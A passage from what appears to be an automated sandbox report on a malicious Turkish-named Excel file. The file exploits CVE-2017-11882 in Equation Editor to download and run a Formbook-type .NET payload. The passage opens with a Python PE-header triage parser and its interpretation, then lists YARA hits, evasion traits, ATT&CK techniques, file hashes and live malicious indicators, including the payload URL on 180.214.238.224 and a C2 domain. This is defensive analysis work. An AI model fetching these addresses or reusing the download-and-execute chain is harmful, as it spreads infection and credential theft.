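    machine, nsect, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    dirs = opt + (96 if struct.unpack_from("<H", data, opt)[0] == 0x10B else 112)
    clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 14 * 8)  # directory 14: CLR runtime header
    sections = []
    for i in range(nsect):
        name, _, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + i * 40)
        sections.append((name.rstrip(b"\0").decode("ascii"), vaddr, rawsize, rawptr))
    info = {"machine": machine, "is_dotnet": clr_size > 0, "sections": sections,
            "compiled_utc": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
            "size_from_sections": max(p + s for _, _, s, p in sections),  # end of the last raw section
            "entry_point_token": 0, "managed_resources_size": 0}
    if clr_size:
        # IMAGE_COR20_HEADER: cb, runtime major/minor, MetaData rva/size, Flags, EntryPointToken, Resources rva/size
        fields = struct.unpack_from("<IHHIIIIII", data, rva_to_offset(clr_rva, sections))
        info["entry_point_token"], info["managed_resources_size"] = fields[6], fields[8]
    return info

def triage_download(raw):
    """Return (status, headers, pe fields, findings) for a captured PE download."""
    status, headers, body = split_response(raw)
    pe = parse_pe_header(body)
    declared = int(headers.get("content-length", "0"))
    findings = []
    if headers.get("content-type") == "application/x-msdownload":
        findings.append("server labels the body as a Windows executable")
    if declared == pe["size_from_sections"]:
        findings.append("Content-Length equals the PE section extent: whole file, no overlay")
    if pe["is_dotnet"]:
        findings.append(".NET assembly; %d of %d bytes are managed resources"
                        % (pe["managed_resources_size"], declared))
    return status, headers, pe, findings
```

Run over the bytes above, the parser reports Machine 0x14C, a build time of 2022-05-13T09:07:06Z (four seconds before the server's Last-Modified of 09:07:10 GMT, so the binary was put on the web server essentially as it left the compiler; deterministic .NET builds can store a hash in this field instead, so the agreement with Last-Modified is what makes the value credible here), a CLR header (a .NET loader, consistent with the BSJB and CryptoObfuscator PDB strings elsewhere in this report, entry point MethodDef token 0x06000003) and 0x31310 = 201488 bytes of managed resources in a 229376-byte file. The bulk of the file is an embedded blob, which is what the reported .text entropy of 7.92 is measuring, and the section extent matching Content-Length means the sandbox saw the complete file.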

    E-Banking Fraud

    Source: Yara match | File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    System Summary

    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_003358D3
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E24D0
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E5610
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E0678
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E1CE8
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E1CE7
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E65A0
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E0638
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 77740000 page execute and read and write
    Source: vbc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: vbc[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: TedarikciSiparisi_83613 .xlsx | ReversingLabs: Detection: 34%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5F10.tmp
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@6/18@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\Public\vbc.exe | Code function: 4_2_002E3AC0 push esp; ret
    Source: initial sample | Static PE information: section name: .text entropy: 7.92488075838
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

    Boot Survival

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (10 identical entries)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (8 identical entries)
    Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX (16 identical entries)

    Malware Analysis System Evasion

    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344 | Thread sleep time: -300000s >= -30000s
    Source: C:\Users\Public\vbc.exe TID: 1036 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
    Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node (2 identical entries)
    Source: EQNEDT32.EXE, 00000002.00000002.956335622.00000000006F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: EQNEDT32.EXE, 00000002.00000002.956117653.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036306C7 mov edx, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: Yara match | File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    Source: Yara match | File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Initial Access
    • Valid Accounts
    • Default Accounts
    • Domain Accounts
    • Local Accounts
    • Cloud Accounts
    • Replication Through Removable Media
    • External Remote Services
    • Drive-by Compromise

    Execution
    • 1 Scripting
    • 1 Native API
    • 22 Exploitation for Client Execution
    • At (Windows)
    • Cron
    • Launchd
    • Scheduled Task
    • Command and Scripting Interpreter

    Persistence
    • Path Interception
    • Boot or Logon Initialization Scripts
    • Logon Script (Windows)
    • Logon Script (Mac)
    • Network Logon Script
    • Rc.common
    • Startup Items
    • Scheduled Task/Job

    Privilege Escalation
    • 11 Process Injection
    • 1 Extra Window Memory Injection
    • Logon Script (Windows)
    • Logon Script (Mac)
    • Network Logon Script
    • Rc.common
    • Startup Items
    • Scheduled Task/Job

    Defense Evasion
    • 111 Masquerading
    • 1 Disable or Modify Tools
    • 21 Virtualization/Sandbox Evasion
    • 11 Process Injection
    • 1 Scripting
    • 2 Obfuscated Files or Information
    • 2 Software Packing
    • 1 Extra Window Memory Injection

    Credential Access
    • OS Credential Dumping
    • LSASS Memory
    • Security Account Manager
    • NTDS
    • LSA Secrets
    • Cached Domain Credentials
    • DCSync
    • Proc Filesystem

    Discovery
    • 11 Security Software Discovery
    • 1 Process Discovery
    • 21 Virtualization/Sandbox Evasion
    • 1 Remote System Discovery
    • 1 File and Directory Discovery
    • 13 System Information Discovery
    • Network Sniffing
    • Network Service Scanning

    Lateral Movement
    • Remote Services
    • Remote Desktop Protocol
    • SMB/Windows Admin Shares
    • Distributed Component Object Model
    • SSH
    • VNC
    • Windows Remote Management
    • Shared Webroot

    Collection
    • 1 Archive Collected Data
    • Data from Removable Media
    • Data from Network Shared Drive
    • Input Capture
    • Keylogging
    • GUI Input Capture
    • Web Portal Capture
    • Credential API Hooking

    Exfiltration
    • Exfiltration Over Other Network Medium
    • Exfiltration Over Bluetooth
    • Automated Exfiltration
    • Scheduled Transfer
    • Data Transfer Size Limits
    • Exfiltration Over C2 Channel
    • Exfiltration Over Alternative Protocol
    • Exfiltration Over Symmetric Encrypted Non-C2 Protocol

    Command and Control
    • 1 Encrypted Channel
    • 33 Ingress Tool Transfer
    • 1 Non-Application Layer Protocol
    • 121 Application Layer Protocol
    • Fallback Channels
    • Multiband Communication
    • Commonly Used Port
    • Application Layer Protocol

    Network Effects
    • Eavesdrop on Insecure Network Communication
    • Exploit SS7 to Redirect Phone Calls/SMS
    • Exploit SS7 to Track Device Location
    • SIM Card Swap
    • Manipulate Device Communication
    • Jamming or Denial of Service
    • Rogue Wi-Fi Access Points
    • Downgrade to Insecure Protocols

    Remote Service Effects
    • Remotely Track Device Without Authorization
    • Remotely Wipe Data Without Authorization
    • Obtain Device Cloud Backups

    Impact
    • Modify System Partition
    • Device Lockout
    • Delete Device Data
    • Carrier Billing Fraud
    • Manipulate App Store Rankings or Ratings
    • Abuse Accessibility Features
    • Data Encrypted for Impact
    • Generate Fraudulent Advertising Revenue

    Source | Detection | Scanner | Label
    TedarikciSiparisi_83613 .xlsx | 34% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

    Source | Detection | Scanner | Label
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 41% | ReversingLabs | Win32.Trojan.Pwsx
    C:\Users\Public\vbc.exe | 41% | ReversingLabs | Win32.Trojan.Pwsx

    Source | Detection | Scanner | Label
    4.2.vbc.exe.300000.0.unpack | 100% | Avira | HEUR/AGEN.1222351
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://180.214.238.224/__cloud_for_file/vbc.exe95C: | 0% | Avira URL Cloud | safe
    http://180.214.238.224/__cloud_for_file/vbc.exeu | 0% | Avira URL Cloud | safe
    http://180.214.238.224/__cloud_for_file/vbc.exe | 100% | Avira URL Cloud | malware
    http://180.214.238.224/__cloud_for_file/vbc.exeX | 0% | Avira URL Cloud | safe
    http://180.214.238.224/__cloud_for_file/vbc.exehhC: | 0% | Avira URL Cloud | safe
    www.mentalnayaarifmetika.online/ocgr/ | 100% | Avira URL Cloud | malware
    http://180.214.238.224/__cloud_for_file/vbc.exej | 0% | Avira URL Cloud | safe
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://180.214.238.224/__cloud_for_file/vbc.exe | true | Avira URL Cloud: malware | unknown
    www.mentalnayaarifmetika.online/ocgr/ | true | Avira URL Cloud: malware | low

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://180.214.238.224/__cloud_for_file/vbc.exe95C: | EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeu | EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeX | EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exehhC: | EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exej | EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    180.214.238.224 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:626598
    Start date and time:14/05/2022 15:12:57 (2022-05-14 15:12:57 +02:00)
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 34s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:TedarikciSiparisi_83613 .xlsx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.expl.evad.winXLSX@6/18@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 1% (good quality ratio 0.8%)
    • Quality average: 56.5%
    • Quality standard deviation: 32.2%
    HCA Information:
    • Successful, ratio: 99%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .xlsx
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe
    • TCP Packets have been reduced to 100
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    Time | Type | Description
    15:14:38 | API Interceptor | 88x Sleep call for process: EQNEDT32.EXE modified
    15:14:43 | API Interceptor | 19x Sleep call for process: vbc.exe modified
    No context
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:downloaded
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Reputation:low
    IE Cache URL:http://180.214.238.224/__cloud_for_file/vbc.exe
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):1099960
    Entropy (8bit):2.0152800116954332
    Encrypted:false
    SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
    MD5:BD4C089D8210CF4FCF74013334B2B925
    SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
    SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
    SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
